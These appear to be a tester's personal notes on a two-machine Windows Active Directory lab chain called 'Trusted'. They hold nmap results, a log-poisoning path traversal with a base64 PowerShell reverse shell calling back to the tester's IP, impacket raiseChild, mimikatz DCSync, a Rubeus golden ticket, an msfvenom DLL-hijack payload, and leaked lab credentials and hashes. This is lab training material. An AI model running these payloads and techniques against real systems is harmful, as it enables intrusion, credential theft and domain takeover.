Trusted (Chain)
This is not a writeup, just my notes about the machine.
Machine information

Operating System: Windows
Chain: True (2 Machines)
Credentials
root
SuperSecureMySQLPassw0rd1337.
Exfiltration file
Internal Database on 10.10.222.118
✅ Valid Usernames
root
🔑 Passwords list
SuperSecureMySQLPassw0rd1337.
Information Gathering
nmap -p- -A --open -T5 -Pn -n -oN ext_trusted_tcp_allports -vvv --min-rate 3000 10.10.222.117-118
10.10.222.117
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-04-01 13:31:12Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
464/tcp open kpasswd5? syn-ack
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49673/tcp open msrpc syn-ack Microsoft Windows RPC
49678/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc syn-ack Microsoft Windows RPC
51583/tcp open msrpc syn-ack Microsoft Windows RPC
52197/tcp open msrpc syn-ack Microsoft Windows RPC
64160/tcp open msrpc syn-ack Microsoft Windows RPC
10.10.222.118
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-04-01 13:31:11Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3306/tcp open mysql syn-ack MySQL 5.5.5-10.4.24-MariaDB
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49672/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack Microsoft Windows RPC
49687/tcp open msrpc syn-ack Microsoft Windows RPC
51961/tcp open msrpc syn-ack Microsoft Windows RPC
57796/tcp open msrpc syn-ack Microsoft Windows RPC
60330/tcp open msrpc syn-ack Microsoft Windows RPC
Service enumeration
10.10.90.117
SMB (enum4linux-ng)
LDAP/s: timed out
SMB: time out
DNS
Not vulnerable to AXFR
10.10.90.118
SMB (enum4linux-ng)
LDAP/s: timed out
SMB: time out
DNS
Not vulnerable to AXFR
HTTP

Initial Foothold
Discovering File Path Traversal
Path: http://10.10.222.118/dev/index.html?view=../../../../../../../../../../../../../../xampp/apache/logs/access.log

Poisoning the User-Agent header.

Verifying the Success of the attack

Exploiting to obtain a reverse shell.
GET /dev/index.html?view=../../../../../../../../../../../../../../xampp/apache/logs/access.log&cmd=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADUALgA0ADgAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1
Host: 10.10.222.118
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,es;q=0.8
Cookie: PHPSESSID=jljs9h2k5vaj3sl6kf21alo2ns
Connection: keep-alive

Compromise parent domain
During the enumeration the tester discovered that the domains has a Bidirectional Trust.
PS C:\xampp\htdocs\dev> Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=trusted.vl,CN=System,DC=lab,DC=trusted,DC=vl
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : trusted.vl
ObjectClass : trustedDomain
ObjectGUID : c8005918-3c50-4c33-bcaa-90c76f46561c
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=lab,DC=trusted,DC=vl
Target : trusted.vl
Automatic ExtraSids Attack
❯ impacket-raiseChild lab.trusted.vl/Administrator -hashes :75878369ad33f35b7070ca854100bc07 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Raising child domain lab.trusted.vl
[*] Forest FQDN is: trusted.vl
[*] Raising lab.trusted.vl to trusted.vl
[*] trusted.vl Enterprise Admin SID is: S-1-5-21-3576695518-347000760-3731839591-519
[*] Getting credentials for lab.trusted.vl
lab.trusted.vl/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl/krbtgt:aes256-cts-hmac-sha1-96s:c930ddb15c3f84aafa01e816abc1112e38430b574ae3fcdd019e77bc906494aa
[*] Getting credentials for trusted.vl
trusted.vl/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9436aebee2db5c6e4166d5e2472fa2d:::
trusted.vl/krbtgt:aes256-cts-hmac-sha1-96s:3e5bc8a7d01388cdaf4ab8541f4e360d4fd9089723cedfd08f8016b7900ba2bf
[*] Target User account name is Administrator
trusted.vl/Administrator:500:aad3b435b51404eeaad3b435b51404ee:15db914be1e6a896e7692f608a9d72ef:::
trusted.vl/Administrator:aes256-cts-hmac-sha1-96s:d75ec7df1acac724a6dfc250e707aab3492b6d9936b9898f742781b0a871d4a6
Manual ExtraSids Attack
Extracting krbtgt's NTLM
PS C:\Temp> .\mimikatz.exe privilege::debug "lsadump::dcsync /domain:lab.trusted.vl /user:LAB\krbtgt /patch" exit
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 9/14/2022 6:43:59 PM
Object Security ID : S-1-5-21-2241985869-2159962460-1278545866-502
Object Relative ID : 502
Credentials:
Hash NTLM: c7a03c565c68c6fac5f8913fab576ebd
Extracting Current Domain SID
PS C:\Temp> Get-DomainSID
S-1-5-21-2241985869-2159962460-1278545866
Extracting Enterprise Admins SID Group
PS C:\Temp> Get-ADGroup -Identity "Enterprise Admins" -Server trusted.vl
DistinguishedName : CN=Enterprise Admins,CN=Users,DC=trusted,DC=vl
GroupCategory : Security
GroupScope : Universal
Name : Enterprise Admins
ObjectClass : group
ObjectGUID : 9e72548e-1fda-486c-b426-6bcb7f171253
SamAccountName : Enterprise Admins
SID : S-1-5-21-3576695518-347000760-3731839591-519
Crafting Golden Ticket
PS C:\Temp> .\Rubeus.exe golden /rc4:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /user:Administrator /ptt
Performing DCSync Attack against trusted.vl
trusted.vl
PS C:\Temp> .\mimikatz.exe privilege::debug "lsadump::dcsync /domain:trusted.vl /dc:TRUSTEDDC.trusted.vl /user:TRUSTED\Administrator /patch" exit
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration : 1/1/1601 12:00:00 AM
Password last change : 9/18/2022 8:50:53 PM
Object Security ID : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID : 500
Credentials:
Hash NTLM: 15db914be1e6a896e7692f608a9d72ef
<SNIF>
Privilege escalation on labdc via DLL Hijacking
During enumeration, the tester found a custom binary named KasperskyRemovalTool.exe
in C:\AVTest
. Upon analysis, it was discovered that when the binary is executed, it attempts to load KasperskyRemovalToolENU.dll
from the current directory. Since the DLL is not present, this behavior leads to a DLL hijacking opportunity.

To exploit this vulnerability:
Create a malicious DLL
Transfer the DLL to
C:\AVTest
Execute the binary
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll > KasperskyRemovalToolENU.dll
Last updated